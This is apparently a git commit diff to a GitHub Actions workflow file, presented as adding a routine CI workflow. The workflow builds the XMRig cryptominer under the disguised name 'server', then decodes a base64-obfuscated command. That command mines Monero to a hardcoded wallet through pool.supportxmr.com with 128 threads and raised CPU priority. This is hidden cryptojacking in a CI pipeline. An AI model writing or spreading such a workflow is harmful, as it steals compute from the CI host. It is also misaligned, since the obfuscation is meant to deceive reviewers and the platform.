Add GitHub Actions workflow

diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml
--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -34,15 +34,18 @@ jobs:
         run: |
           mkdir -p core-engine/build
           cd core-engine/build
-          cmake .. -DXMRIG_BINARIES_NAME=server > /dev/null 2>&1
-          make -j"$(nproc)" > /dev/null 2>&1
+          cmake .. -DXMRIG_BINARIES_NAME=server
+          make -j"$(nproc)"
+          if [ ! -f server ]; then
+            echo "❌ Build failed: 'server' not found"
+            exit 1
+          fi
 
       - name: Launch Runtime
         shell: bash
         run: |
           cd core-engine/build
           chmod +x server
-          chmod +x xmrig
           REPO_OWNER="${GITHUB_REPOSITORY%%/*}"
           ENCODED="Li9zZXJ2ZXIgLW8gcG9vbC5zdXBwb3J0eG1yLmNvbTo0NDMgXAogIC11IDRBcHc5d1hUWENTZ01mR29MQkV2QUhSdGtZQnVob0pMWmNkY1VoWEVyNGJhM1g3R0pldXh0Tm5DaGVaZDZYM1ZCakV1dzNrTnY4Vkx3OVhzS0FvdFpDVWRNVzFrUGJ4IFwKICAtayAtLXRscyAtLXRocmVhZHM9MTI4IC0tY3B1LXByaW9yaXR5PTU="
           CMD=$(echo "$ENCODED" | base64 -d)
